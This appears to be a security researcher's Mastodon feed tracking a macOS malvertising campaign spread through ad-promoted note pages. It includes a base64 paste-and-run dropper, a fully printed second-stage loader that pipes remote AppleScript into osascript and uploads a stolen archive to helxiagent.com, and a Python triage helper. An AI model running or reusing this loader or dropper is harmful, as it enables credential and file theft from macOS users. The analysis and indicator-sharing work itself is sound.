
Developer at a cybersecurity startup.

Infosec hobbyist, hope that one day I'll actually be able to contribute.

Rarely complete projects (ask me about my honeypot, or pippin)

Twitter: https://twitter.com/fauxeccles
GH: https://github.com/faux-eccles
Pronouns: he/him

RE: https://mastodon.social/@glyph/116467342354581349

Slightly different context, but I've been trying to be mindful of this language in design/planning meetings, as more often than not it's a sign I'm making assumptions about the thing being spoken about, and underselling a topic I don't fully understand.

RE: https://infosec.exchange/@eccles/116294997807124774

Oh rad, this has the same MO as what I found, possibly the same campaign. Didn't even occur to me that it could be classified as *fix.

Though the Claude version is doing a full domain copy, rather than making use of legitimate doc services.

https://pushsecurity.com/blog/installfix/

Oh man, all my angst, & look what I spotted when I checked the mail. I actually have lots of these, Banksia Spinulosa (Hairpin Banksia), but few have such red hairpins. It was so lovely I had to share! Ain't it a beaut? 😁

No scent, but an important local wildlife food source. I'm on Darug/Gundungurra country (spellings vary), referred to here:

https://fieldofmar-e.schools.nsw.gov.au/fact-sheets/plants/hairpin-banksia-fact-sheet

#BloomScrolling
#BlueMountains
#Banksia

New page on slab; the copy-paste code has changed though.

https://urlscan.io/result/019d3c7f-457e-7030-8384-929181e511ed/

'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1rZnNTTCBodHRwOi8vaGVseGlhZ2VudC5jb20vY3VybC85MWMxMWQ0YzM1NmZkNzU0NzgwYzBhNWI4YzU4YjUwMjRlYThlYTFiMzdiYjg1ZGNhYTlmZWIwM2UwM2FkZDg3fHpzaA=='

piped into zsh.

Leads to https://urlscan.io/result/019d3c8c-9db9-77de-8159-d0d05b0ca1bb/ which appears to have some user-agent filtering, as with curl we get a similar second-stage payload as before.

New domain IoC helxiagent[.]com; can't find anything about it though. Appears to be heavily used in obfuscating the final drop.

#!/bin/zsh
# Second-stage loader as captured, annotated for analysis. It detaches from the
# terminal, fetches AppleScript from the C2 and pipes it to osascript, then
# uploads /tmp/osalogging.zip back to the C2 in 10 MiB chunks.
daemon_function() {
    # Detach stdin/stdout/stderr so nothing is shown to the user
    exec </dev/null
    exec >/dev/null
    exec 2>/dev/null
    local domain="helxiagent.com"
    local token="91c11d4c356fd754780c0a5b8c58b5024ea8ea1b37bb85dcaa9feb03e03add87"
    local api_key="5190ef1733183a0dc63fb623357f56d6"
    local file="/tmp/osalogging.zip"
    # Fetch the AppleScript stage (first argument, if any, is sent as pwd=) and execute it
    if [ $# -gt 0 ]; then
        curl -k -s --max-time 30 \
            -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
            -H "api-key: $api_key" \
            "http://$domain/dynamic?txd=$token&pwd=$1" | osascript
    else
        curl -k -s --max-time 30 \
            -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
            -H "api-key: $api_key" \
            "http://$domain/dynamic?txd=$token" | osascript
    fi
    if [ $? -ne 0 ]; then
        exit 1
    fi
    # The AppleScript stage is expected to have written the archive; bail if it is missing or empty
    if [[ ! -f "$file" || ! -s "$file" ]]; then
        return 1
    fi
    local CHUNK_SIZE=$((10 * 1024 * 1024))
    local MAX_RETRIES=8
    local upload_id=$(date +%s)-$(openssl rand -hex 8 2>/dev/null || echo $RANDOM$RANDOM)
    local total_size
    total_size=$(stat -f %z "$file" 2>/dev/null || stat -c %s "$file")
    if [[ -z "$total_size" || "$total_size" -eq 0 ]]; then
        return 1
    fi
    local total_chunks=$(( (total_size + CHUNK_SIZE - 1) / CHUNK_SIZE ))
    local i=0
    # Chunked upload via PUT to /gate, each chunk retried with increasing back-off
    while (( i < total_chunks )); do
        local offset=$((i * CHUNK_SIZE))
        local chunk_size=$CHUNK_SIZE
        (( offset + chunk_size > total_size )) && chunk_size=$((total_size - offset))
        local success=0
        local attempt=1
        while (( attempt <= MAX_RETRIES && success == 0 )); do
            http_code=$(dd if="$file" bs=1 skip=$offset count=$chunk_size 2>/dev/null | \
                curl -k -s -X PUT \
                    --data-binary @- \
                    -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
                    -H "api-key: $api_key" \
                    --max-time 180 \
                    -o /dev/null \
                    -w "%{http_code}" \
                    "http://$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks" 2>/dev/null)
            curl_status=$?
            if [[ $curl_status -eq 0 && $http_code -ge 200 && $http_code -lt 300 ]]; then
                success=1
            else
                ((attempt++))
                sleep $((3 + attempt * 2))
            fi
        done
        if (( success == 0 )); then
            return 1
        fi
        ((i++))
    done
    # Remove the archive once it has been uploaded
    rm -f "$file"
    return 0
}
if daemon_function "$@" & then
    exit 0
else
    exit 1
fi
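An added triage helper, not the author's code, for the two artefacts above: it decodes the quoted copy-paste blob, pulls out the contacted host and URL path, and flags the pipe-to-interpreter and curl -k (insecure TLS) pattern that both the one-liner and the second-stage script rely on. The BLOB value is the one quoted in the post; the regexes, function names and the single constructed osascript line in the test are assumptions.

```python
import base64
import re

# The copy-paste blob exactly as quoted in the post above (a page value, not constructed).
BLOB = ("'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1rZnNTTCBodHRwOi8v"
        "aGVseGlhZ2VudC5jb20vY3VybC85MWMxMWQ0YzM1NmZkNzU0NzgwYzBhNWI4YzU4YjUwMjRlYThlYTFiMzdi"
        "Yjg1ZGNhYTlmZWIwM2UwM2FkZDg3fHpzaA=='")

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(/[^\s\"'|&]*)?")
PIPE_RE = re.compile(r"\|\s*(zsh|bash|sh|osascript)\b")

def decode_blob(blob: str) -> str:
    """Strip the surrounding quotes and base64-decode the pasted one-liner."""
    return base64.b64decode(blob.strip().strip("'\"")).decode("utf-8", "replace")

def defang(host: str) -> str:
    """Render a hostname so it is not clickable or auto-linked in a report."""
    return host.replace(".", "[.]")

def curl_short_flags(script: str) -> set:
    """Collect single-letter flags (k = --insecure, s = silent, ...) from every curl call."""
    flags = set()
    for m in re.finditer(r"\bcurl\b", script):
        for tok in script[m.end():].split():
            if not tok.startswith("-"):
                break
            if not tok.startswith("--"):
                flags.update(tok[1:])
    return flags

def triage(script: str) -> dict:
    """Summarise a one-liner or loader script: hosts, URL paths, pipe-to-interpreter use."""
    hosts, paths = [], []
    for host, path in URL_RE.findall(script):
        if host not in hosts:
            hosts.append(host)
        if path:
            paths.append(path)
    flags = curl_short_flags(script)
    return {
        "hosts": [defang(h) for h in hosts],
        "paths": paths,
        "pipes_to": sorted(set(PIPE_RE.findall(script))),
        "insecure_tls": "k" in flags,  # -k disables certificate checking
        "curl_flags": "".join(sorted(flags)),
    }

if __name__ == "__main__":
    print(triage(decode_blob(BLOB)))
```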

Cloudflare has already taken down the loader URL, so at least there's that.

Which appears to have been authored today using the same account name, Mac Dev, on a different service. What the two platforms have in common is that they make it hard to report accounts/published pages.

So new, in fact, that Google Ads Transparency doesn't have this ad listed, nor any others for this domain.

httpX://share.supernotes[.]app/scene+lecture+tooth+pupil/?gad_source=1&gad_campaignid=23690246307&gbraid=0AAAAADvuqr5J4xYKwmF7fO2d1qw_v-Lbe&gclid=CjwKCAjwspPOBhB9EiwATFbi5GITIyzMjnVnSz_HXDXqQECD00FGVRLHYJ1W6USLzFxmEp2G3W9QchoCvm4QAvD_BwE

Good news: the original ad was taken down. Bad news: a new app with the same thing has popped up. Moved from slab[.]com to supernotes[.]app; they clearly like these services that allow nice formatting under a trusted domain.

In case anyone was wondering, #mellowtel still seems to be processing requests. Whether it's still via the browser botnet I'm not sure, but I assume so.

Some queries I've noted,

- circumventing query restrictions for searching government business dbs
- loading Instagram pages
- using the Perplexity API for determining product recommendations for various questions
- performing Google searches and extracting the AI result

https://arstechnica.com/security/2025/07/browser-extensions-turn-nearly-1-million-browsers-into-website-scraping-bots/

Seems like slab has been used a bit here and there for this campaign, using various compromised ads accounts:
https://adstransparency.google.com/?region=anywhere&platform=SEARCH&query=Homebrew+for+Mac&domain=slab.com

Huge number of different ads accounts, all following similar approaches; the oldest ad might be March 22nd.

Interesting addendum about the advertiser https://adstransparency.google.com/advertiser/AR08935176312499208193?origin=ata&region=anywhere

I suspect it could be a compromised ads account; that being said, I can't actually find this ad listed in the transparency page.